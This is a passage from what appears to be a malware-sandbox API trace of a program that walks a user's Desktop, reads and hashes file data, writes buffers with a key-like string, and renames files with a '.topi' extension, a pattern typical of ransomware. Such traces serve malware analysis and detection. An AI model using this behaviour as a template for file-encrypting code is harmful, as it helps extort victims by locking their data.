Size=0x30) returned 0x31c3fe8 [0094.294] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x145d0) returned 0x99f52d8 [0094.295] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.295] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.295] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0094.295] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.295] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0094.295] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.295] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3538 [0094.295] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8dc0 [0094.295] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d35c8 [0094.295] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8ee0 [0094.295] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f58 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f70 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0094.296] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f58 | out: hHeap=0x680000) returned 1 [0094.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f70 | out: hHeap=0x680000) returned 1 [0094.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8f70 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8f58 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f70 | out: hHeap=0x680000) returned 1 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f58 | out: hHeap=0x680000) returned 1 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.297] GetCurrentThreadId () returned 0x8c4 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1310 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.297] GetCurrentThreadId () returned 0x8c4 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f58 [0094.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f70 [0094.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8d48 [0094.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.298] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8f88 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f58 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f58 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x3165e90 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f58 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31bc228 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bc228 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f88 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f70 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8d48 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8ee0 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d35c8 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0094.301] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x145c7, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x145c7, lpOverlapped=0x0) returned 1 [0094.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x145cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.301] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0094.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0094.301] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.302] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.302] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.302] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.302] CloseHandle (hObject=0x6a8) returned 1 [0094.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.303] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.303] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.303] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3xYK0ZckOZDaaz36qgE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3xyk0zckozdaaz36qge.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3xYK0ZckOZDaaz36qgE.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3xyk0zckozdaaz36qge.jpg.topi")) returned 1 [0094.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.304] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.304] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.305] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.306] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55e248e0, ftCreationTime.dwHighDateTime=0x1d5c0e3, ftLastAccessTime.dwLowDateTime=0x5d27cae0, ftLastAccessTime.dwHighDateTime=0x1d5bdef, ftLastWriteTime.dwLowDateTime=0x5d27cae0, ftLastWriteTime.dwHighDateTime=0x1d5bdef, nFileSizeHigh=0x0, nFileSizeLow=0xed8b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4co9lJ.pptx", cAlternateFileName="4CO9LJ~1.PPT")) returned 1 [0094.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.306] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.306] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4co9lJ.pptx") returned=".pptx" [0094.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4co9lJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4co9lj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.306] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=60811) returned 1 [0094.306] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.309] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xed65, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.309] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.311] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.311] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.311] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.311] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.312] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.312] GetLastError () returned 0x0 [0094.312] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.312] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.312] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.312] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.312] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.312] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.313] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4co9lJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4co9lj.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4co9lJ.pptx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4co9lj.pptx.topi")) returned 1 [0094.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.313] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.313] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.315] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.315] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f92c20, ftCreationTime.dwHighDateTime=0x1d5b68e, ftLastAccessTime.dwLowDateTime=0xb7e79760, ftLastAccessTime.dwHighDateTime=0x1d5c602, ftLastWriteTime.dwLowDateTime=0xb7e79760, ftLastWriteTime.dwHighDateTime=0x1d5c602, nFileSizeHigh=0x0, nFileSizeLow=0x8416, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6sr80q9hh7H4Me.png", cAlternateFileName="6SR80Q~1.PNG")) returned 1 [0094.315] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6sr80q9hh7H4Me.png") returned=".png" [0094.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6sr80q9hh7H4Me.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6sr80q9hh7h4me.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.315] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=33814) returned 1 [0094.315] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.318] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x83f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.318] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, 